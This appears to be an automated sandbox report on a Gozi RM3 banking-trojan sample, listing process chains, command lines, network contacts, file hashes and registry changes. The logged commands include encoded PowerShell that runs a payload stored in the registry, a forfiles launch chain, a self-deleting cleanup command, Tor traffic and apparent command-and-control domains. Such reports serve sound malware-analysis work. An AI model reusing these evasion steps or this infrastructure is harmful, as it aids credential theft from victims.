PID 1936 wrote to memory of 984 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1936 wrote to memory of 984 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1736 wrote to memory of 1356 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\forfiles.exe
PID 1736 wrote to memory of 1356 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\forfiles.exe
PID 1736 wrote to memory of 1356 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\forfiles.exe
PID 1356 wrote to memory of 756 N/A C:\Windows\system32\forfiles.exe C:\Windows\system32\cmd.exe
PID 1356 wrote to memory of 756 N/A C:\Windows\system32\forfiles.exe C:\Windows\system32\cmd.exe
PID 1356 wrote to memory of 756 N/A C:\Windows\system32\forfiles.exe C:\Windows\system32\cmd.exe
PID 756 wrote to memory of 1912 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 756 wrote to memory of 1912 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 756 wrote to memory of 1912 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 1992 wrote to memory of 1264 N/A C:\Users\Admin\AppData\Local\Temp\520636dbbdc33d8dbdf1b14f043b46f8.exe C:\Windows\Explorer.EXE
PID 1912 wrote to memory of 1404 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1912 wrote to memory of 1404 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1912 wrote to memory of 1404 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1912 wrote to memory of 592 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1912 wrote to memory of 592 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1912 wrote to memory of 592 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1912 wrote to memory of 1932 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 1912 wrote to memory of 1932 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 1912 wrote to memory of 1932 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 1932 wrote to memory of 1076 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1932 wrote to memory of 1076 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1932 wrote to memory of 1076 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1912 wrote to memory of 1948 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 1912 wrote to memory of 1948 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 1912 wrote to memory of 1948 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 1948 wrote to memory of 1524 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1948 wrote to memory of 1524 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1948 wrote to memory of 1524 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1912 wrote to memory of 1264 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 1788 wrote to memory of 1636 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\timeout.exe
PID 1788 wrote to memory of 1636 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\timeout.exe
PID 1788 wrote to memory of 1636 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\timeout.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\520636dbbdc33d8dbdf1b14f043b46f8.exe

"C:\Users\Admin\AppData\Local\Temp\520636dbbdc33d8dbdf1b14f043b46f8.exe"

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1936 CREDAT:275457 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1936 CREDAT:996356 /prefetch:2

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /min forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBvAGQAZQBhAHIAYwBoAGkAdgBlACcAKQAuAFMA & exit" /p C:\Windows\system32 /s /m po*l.e*e

C:\Windows\system32\forfiles.exe

forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBvAGQAZQBhAHIAYwBoAGkAdgBlACcAKQAuAFMA & exit" /p C:\Windows\system32 /s /m po*l.e*e

C:\Windows\system32\cmd.exe

/k "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBvAGQAZQBhAHIAYwBoAGkAdgBlACcAKQAuAFMA & exit

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBvAGQAZQBhAHIAYwBoAGkAdgBlACcAKQAuAFMA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JwBwAGEAcgBhAG0AKAAkAG8AdgB0AHMAbAB5ACkAOwBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABvAHYAdABzAGwAeQApACcA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JwBwAGEAcgBhAG0AKAAkAHAAYgBmAG0AYwBnAHQAcwB1AGYAbQApADsAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHAAYgBmAG0AYwBnAHQAcwB1AGYAbQApACcA

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\osypmjrv.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA842.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCA841.tmp"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\oza3_e8q.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA91C.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCA91B.tmp"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C timeout /t 5 && del "C:\USERS\ADMIN\APPDATA\LOCAL\TEMP\520636DBBDC33D8DBDF1B14F043B46F8.EXE"

C:\Windows\system32\timeout.exe

timeout /t 5

Network

Country Destination Domain Proto
US 8.8.8.8:53 gogojoob.xyz udp
NL 194.104.136.213:443 gogojoob.xyz tcp
NL 194.104.136.213:443 gogojoob.xyz tcp
NL 194.104.136.213:443 gogojoob.xyz tcp
PL 193.111.26.37:443 tcp
VN 125.212.217.197:80 125.212.217.197 tcp
US 209.141.45.189:80 209.141.45.189 tcp
LU 185.26.127.24:80 185.26.127.24 tcp
US 199.249.230.185:80 199.249.230.185 tcp
MY 124.217.246.99:80 124.217.246.99 tcp
US 199.249.230.185:80 199.249.230.185 tcp
US 198.98.61.131:80 198.98.61.131 tcp
SE 193.189.100.205:80 193.189.100.205 tcp
IS 82.221.131.5:80 tcp
FR 62.210.137.233:443 62.210.137.233 tcp
VN 125.212.217.197:80 125.212.217.197 tcp
SE 193.189.100.205:80 193.189.100.205 tcp
US 199.249.230.181:80 199.249.230.181 tcp
FR 163.172.139.104:8080 163.172.139.104 tcp
RU 213.183.56.140:8080 213.183.56.140 tcp
US 8.8.8.8:53 unavas.xyz udp
US 8.8.8.8:53 microsoft.com udp
NL 91.242.229.120:443 unavas.xyz tcp
DE 178.254.35.99:80 178.254.35.99 tcp
US 8.8.8.8:53 curlmyip.net udp
FI 135.181.84.242:80 curlmyip.net tcp
US 198.98.61.131:80 198.98.61.131 tcp
MY 124.217.246.99:80 124.217.246.99 tcp
NL 91.242.229.120:443 unavas.xyz tcp
CR 200.122.181.78:80 200.122.181.78 tcp
KG 91.213.233.60:80 91.213.233.60 tcp
US 199.249.230.176:80 199.249.230.176 tcp
DE 157.90.38.9:80 157.90.38.9 tcp
US 199.249.230.140:80 199.249.230.140 tcp
US 199.249.230.168:80 199.249.230.168 tcp
JP 163.44.173.37:9030 163.44.173.37 tcp
DE 178.254.35.99:80 178.254.35.99 tcp
CZ 195.123.247.57:80 195.123.247.57 tcp
LV 46.183.217.5:80 46.183.217.5 tcp
US 204.13.164.118:80 204.13.164.118 tcp
CH 141.255.161.167:80 141.255.161.167 tcp
US 199.249.230.105:80 199.249.230.105 tcp
US 199.249.230.86:80 199.249.230.86 tcp
US 199.249.230.185:80 199.249.230.185 tcp
ES 83.44.44.234:81 83.44.44.234 tcp
DE 178.254.9.25:80 178.254.9.25 tcp
DE 185.216.179.206:80 185.216.179.206 tcp
MY 124.217.246.98:80 124.217.246.98 tcp
US 199.249.230.73:80 199.249.230.73 tcp
DE 179.43.141.92:80 179.43.141.92 tcp
US 199.249.230.166:80 199.249.230.166 tcp
LV 46.183.217.5:80 46.183.217.5 tcp
HK 91.245.255.39:80 91.245.255.39 tcp
FR 62.210.137.212:80 tcp
DE 84.16.229.2:80 tcp

Files

memory/1992-54-0x000000000040E000-0x0000000000419000-memory.dmp

memory/1992-55-0x000000000040E000-0x0000000000419000-memory.dmp

memory/1992-56-0x0000000000220000-0x000000000022C000-memory.dmp

memory/1992-57-0x0000000075041000-0x0000000075043000-memory.dmp

memory/1992-58-0x0000000000230000-0x0000000000240000-memory.dmp

memory/1992-64-0x0000000001000000-0x000000000106F000-memory.dmp

memory/1992-65-0x0000000000260000-0x0000000000262000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2760940dd3373665524479ac46781ac2
SHA1 93f6a6076c7e1ab3d535a0fb6adcae0313eef8ac
SHA256 a4d66b76de6889bca2606c99d1002b5b01dd2ffd82a3cac12c72e62702c3da47
SHA512 e7f63ae5fc5db271a16b17703a8fdd56d46a6afe1c582d0e519b2c35e0e5126d34019cf0f90d8985772a147f2810409a57e9b718066f1fe1cbbbae3811c7b0de

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

MD5 54e9306f95f32e50ccd58af19753d929
SHA1 eab9457321f34d4dcf7d4a0ac83edc9131bf7c57
SHA256 45f94dceb18a8f738a26da09ce4558995a4fe02b971882e8116fc9b59813bb72
SHA512 8711a4d866f21cdf4d4e6131ec4cfaf6821d0d22b90946be8b5a09ab868af0270a89bc326f03b858f0361a83c11a1531b894dfd1945e4812ba429a7558791f4f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

MD5 8d59154f9fa5f78b9217db0c169eb259
SHA1 22a3b2e4f5238c8b321b8146dad6950eb272d427
SHA256 b1288af8d602e81a315074a7c369b7d81237d41969290258ef206c17a854e5cf
SHA512 1e89fe9f1a4a7da0ca6c5704d9f09306e67a328611fe8bcc57705e9de7951ad77a2644602f3cc23787404fdb2e619d3615fe6dfbaea9e849ab8480c756c3144d

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\w8w9llr\imagestore.dat

MD5 e0c253dbd4f75919730d1208457db2e0
SHA1 edc50a6801c69134ff04d14f285006ab7ebf0acc
SHA256 059333484fb4042c082f5e1e670bc39356f9a19d934b5c23fc6ab364e89302ee
SHA512 74878e39b29e49e6aed445d75df9e35a0ed49eeffd09a59aefe13effe309d5fffd1ee5bec907f1725d53bb542d448ad8c1260c9cea8eb795c6d4d52f53514595

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3OL83HNN\favicon[1].ico

MD5 a976d227e5d1dcf62f5f7e623211dd1b
SHA1 a2a9dc1abdd3d888484678663928cb024c359ee6
SHA256 66332859bd8e3441a019e073a318b62a47014ba244121301034b510dc7532271
SHA512 6754d545f2ce095cfa1fa7ca9e3223f89e37726ee7e541ebcf3e209e18b2602f3be8677598cb30d697327a63de032c11dbf8ef7ad7889a79c488a21044c1cb3f

memory/1912-71-0x000007FEFB7F1000-0x000007FEFB7F3000-memory.dmp

memory/1912-73-0x000007FEF50D0000-0x000007FEF5A6D000-memory.dmp

memory/1912-74-0x0000000002830000-0x0000000002832000-memory.dmp

memory/1912-75-0x0000000002832000-0x0000000002834000-memory.dmp

memory/1912-76-0x0000000002834000-0x0000000002837000-memory.dmp

memory/1912-72-0x000007FEF2C60000-0x000007FEF37BD000-memory.dmp

memory/1992-77-0x0000000000260000-0x000000000027A000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 625b456ad24406be3c06dce3d5c3432e
SHA1 c7cc8e0c4949ea162d68d6f3e59faedce758d7bf
SHA256 90dabb84166493981c68dee7ee8e96624e4f944dd535cb63f2d982a648cac64e
SHA512 ff3b2c4165ff654727e6e6f3c2c4cbfbc61dfc5c23a1f1f155c1037c088bd07f5ee7a3be75a5867a0c2fb7c328a22a3d950df7e96c0437601533bcde441b92ed

memory/1404-80-0x000007FEF2C60000-0x000007FEF37BD000-memory.dmp

memory/1912-81-0x000000000283B000-0x000000000285A000-memory.dmp

memory/1404-82-0x000007FEF50D0000-0x000007FEF5A6D000-memory.dmp

memory/1404-83-0x0000000002300000-0x0000000002302000-memory.dmp

memory/1404-84-0x000007FEF50D0000-0x000007FEF5A6D000-memory.dmp

memory/1404-85-0x000000000230B000-0x000000000232A000-memory.dmp

memory/1404-86-0x0000000002302000-0x0000000002304000-memory.dmp

memory/1404-87-0x0000000002304000-0x0000000002307000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 625b456ad24406be3c06dce3d5c3432e
SHA1 c7cc8e0c4949ea162d68d6f3e59faedce758d7bf
SHA256 90dabb84166493981c68dee7ee8e96624e4f944dd535cb63f2d982a648cac64e
SHA512 ff3b2c4165ff654727e6e6f3c2c4cbfbc61dfc5c23a1f1f155c1037c088bd07f5ee7a3be75a5867a0c2fb7c328a22a3d950df7e96c0437601533bcde441b92ed

memory/592-90-0x000007FEF2C60000-0x000007FEF37BD000-memory.dmp

memory/592-92-0x0000000002970000-0x0000000002972000-memory.dmp

memory/592-91-0x000007FEF50D0000-0x000007FEF5A6D000-memory.dmp

memory/592-93-0x000007FEF50D0000-0x000007FEF5A6D000-memory.dmp

memory/592-94-0x0000000002972000-0x0000000002974000-memory.dmp

memory/592-95-0x0000000002974000-0x0000000002977000-memory.dmp

memory/592-96-0x000000001B750000-0x000000001BA4F000-memory.dmp

memory/592-97-0x000000000297B000-0x000000000299A000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\osypmjrv.cmdline

MD5 069ff734354afd99b6d5e75d868b1997
SHA1 de903117803306256e72ff697009167ec69cb96f
SHA256 505ede475e1a535e41dab26036a49fb09991de78ce34b157a2f2a486aee4dc93
SHA512 9af3c46dd65f8a4b01aeb3e8b58c462186dbda6020357c594bf535234f9385519aafbcfd796608becc828a4d877049e431379d40b0f48dc35b620849bc742bf0

\??\c:\Users\Admin\AppData\Local\Temp\osypmjrv.0.cs

MD5 7fceb996f934e8bda687cdd2bd46a9a7
SHA1 81e1edbcca6438daaccc3845fa0e3b1a6cff17a6
SHA256 fa53f8174510a9ad008973d47798f022b681e1764a15134efd2004980f23bb6e
SHA512 6aa6253527b72c0605859180887ff19cd96412cb816ec02e832d4a0e0cbcd03d9cc580112e4e2055d4a9ede850c1a339df974371f992b0b9b73e54e137610205

memory/1932-100-0x00000000022F0000-0x00000000022F2000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\CSCA841.tmp

MD5 c12d86f1dc02ea3123cdbee5d780f090
SHA1 993d6216b7d549f301f9c6b322470781c4f3373f
SHA256 31500aed6fdb95d5ad1e36055fd4f6c0afc26126dc4749f132e958b4cf60132c
SHA512 14e5596b519346c1c044576e5b23f59fcc14c239b6e1fe735a6261970b33ac144310a144c9b881c9d8f743d8498de5d30e8a3684eae6bae743f96161b33bf604

C:\Users\Admin\AppData\Local\Temp\RESA842.tmp

MD5 7f1f94f71dcce806d0bca78d612013d2
SHA1 95c33fc2b9e5be4c8ec3e3dc20802652fee94c48
SHA256 956b1c753e9c0028cec53347d7cbf3be5dbd2f4613dcfe6f06c6f860d56ce912
SHA512 e115b20ad57ddae1fb3d357aa83e4f186908832529a936c52f2242965f4edc3bd1c6f2c12ea5055e79836fbd8c8ad19d862752ea8a11738096901a24b44ec8ab

C:\Users\Admin\AppData\Local\Temp\osypmjrv.dll

MD5 ec7a96eefbabd22e6aed087425c95ef6
SHA1 5d32bf83a615701250646bbcb2bef5c8234794ce
SHA256 30578684c26a89bd82378ae4ecc7ce68dd10c7d168f6843e928fdd4d99f35f9f
SHA512 722916ce5825fa8a283413578aef4b0cc110c83f0af42bfc4a40a901e4c399f3b0345dc80833a6eb2a51619e62946604a2e9ba3d5a05670ac8bacaaecc5c0b07

C:\Users\Admin\AppData\Local\Temp\osypmjrv.pdb

MD5 1c01f7d120ec811bebebf853c4c3e1f4
SHA1 d378a6a2b3a070ebaa998f54f5d16f879147e761
SHA256 918cb874e5c417b9a2c237e5dcb6bcfb86f0cb383da6520083a4173fdc93c14a
SHA512 64d79b65aa7178288f570a53e2f3a489fce07b11c645699a995af2d14a8e4254b6224bdf92f9a41a2fbb2e64fbdb3fd44ae1257202ed8f483a819f01e48de6ec

\??\c:\Users\Admin\AppData\Local\Temp\oza3_e8q.cmdline

MD5 ec09b9ded659bf771729da49524ee0e8
SHA1 5da299ddd549cce62f1379e16d8396f6c6c615aa
SHA256 1d36482409f8954a4ad2e52db7a481ce0e119200398ec3337fa0124f6abebdc1
SHA512 665e506e357b1280eb34eee2efd607b7c1bb384b9c988194813b8ab8de5238a52c6b5d46a8126a043d42e2788d12765c50f87f96f931924c24ea79ff77780367

\??\c:\Users\Admin\AppData\Local\Temp\oza3_e8q.0.cs

MD5 697f16b8c6892082559d8a17db343865
SHA1 246d6ba1419478be7915e78b61525da894321fb9
SHA256 518ab091348dea4f49183958185b3d42b5ddb191007bab25b6e69ff6ec923f1f
SHA512 801a428c5dd5ff4a745923914505dcf5a9929b3dbfc5bb5f6320996ad849fa42dc75ac53a432dd01103e0d6db2269583351f14b189a76a066d6f940ff79d38d6

C:\Users\Admin\AppData\Local\Temp\oza3_e8q.pdb

MD5 34db741e5006a94367bc64b11110b0f5
SHA1 a051a45c59d0e033b0d3d6c911d74832cfc17989
SHA256 c50abb56dace7b907031f52db2053a339fa4ab8ac2c84e8aaa03728d66af641a
SHA512 d5027b156a3fed8ff20bc6ad1aa90d5319341d35f440c4d3ae4be3746c3368a1caba53bccd5e72fa7d1126e80e5a2092ec9f9b5ba4a34d2825c43aa8c414a39b

C:\Users\Admin\AppData\Local\Temp\oza3_e8q.dll

MD5 9120556a97a45e7555ebda26a4891e04
SHA1 8d55a8b570407ac13120a661213e3de898df0c22
SHA256 bb1dead640c14f03c904f43a2ac1520f5c8e214508ca3d70c7e7daf46b52765d
SHA512 f642e1a7599a926b6c3e98b632c140f4ada33149975617470e270aeefb7d32d866aa3d80ceb290824a093a1d647ae154d97a426b767157c162b76e550629c5a4

memory/1912-109-0x0000000002910000-0x0000000002923000-memory.dmp

memory/1264-110-0x0000000002AD0000-0x0000000002AE5000-memory.dmp

memory/1264-633-0x0000000002640000-0x0000000002655000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2022-03-15 14:05

Reported

2022-03-15 14:08

Platform

win10v2004-20220310-en

Max time kernel

144s

Max time network

150s

Command Line

C:\Windows\Explorer.EXE

Signatures

Gozi RM3

banker trojan gozi_rm3

Uses Tor communications

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\IESettingSync C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\IESettingSync C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1239828497" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009521245b68481d44b7c4b8cf21a171b600000000020000000000106600000001000020000000cb9dac30eec32464c0c795d63a23a16a1f39e144fbdfd93c39f7732b99cbf3aa000000000e800000000200002000000017dddd0f48c0769f3af9c8afc1933554d96d0346db91e42a44737c75fe3f542f20000000b48ad91c8255229396dbf7f273ecc5e0f72491b5443edf66ec76ad2da20d50c0400000000081386f7dcacf39169071cb38b5d3ab2467633e70bf52fdd268946068c8e5d7e95881abd27e51502f2dbddb2a7e47da4167b7481cc11f835870af9a6be6fb62 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009521245b68481d44b7c4b8cf21a171b600000000020000000000106600000001000020000000de419273ed360fc7b985f29a5666c925130999b06d43ce83f366a6852b34c23c000000000e80000000020000200000003a69eccc18e68114d24bb3f168601f93bde4d41319e870d614be2f4529f96dbbc0000000516a51845089a88aa0450be52c4741b8d4fe5a47492b1601c209c784cc85abb25db0d52fc5fc4a40b2f0de4f96cf2211375f59d7e5706acc40e648bde5bfa6045e884740a02b59e2756b3e18e1c7f36d6b99addfafeee8a5cf779ab8cec5e4fa8957317cc7ebdbef96f4c4619210e4e286fe8d267adadbfbaf7311a4c9d357a29768663975c4b54efdc42e6723246e470556b20f3390611349b5c63b5a33180ee33688c15e2ded65c56c208ce2badb2b835cdf6a33caf63abb17527705533c8e40000000d6743633e0186dd3e47a177ac2c837d302c070379995f69bc4afb7555bf5e6602da2ea75091ad7ff521d76c7f72953575edeafbc8d25105ead4ae3fbca432bc5 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009521245b68481d44b7c4b8cf21a171b600000000020000000000106600000001000020000000eaadc152afb50912a2244160f1e7e4d66eb78ed52dc598744cff45eeeb747b5c000000000e8000000002000020000000391f757eebed04bfc5c7b703d390a326008b043df5cee6d7f234e78d62663a5bc0000000abefa4a65af79707cccef23d3ff7ef0115f34aa2e0a454728a28bff8dd2ee5913f5e9eaab4a94228ee7de102d2dbc7430968651b763743e26c068eaf956459fa73b14b2b790718aaa6ff08eb26d0db317cbd171abc36fd5bdf1a39f037b6a3cba783a37afae48febdfbaf98546fc6fa28cc8967cf390d245c1ef36e002ee6ace3971412b8455d270f99cc92b56aff149f05c0328b3ccce2467f875a9c16bea76f573c50e12be795cc92e2f535f1febea07bb986b3c4368e84b2315a3097183d8400000008c2f29a5648fabdc1d8581408709a732679afb27f6150d526d71b30987bf779cf71de29ac114554f2c902bbc3521761b46d7129e52396d52d14a1fc0e62854b0 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff5800000000000000de04000065020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 6045ab4b7e38d801 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\IESettingSync C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff680000001a000000ee0400007f020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
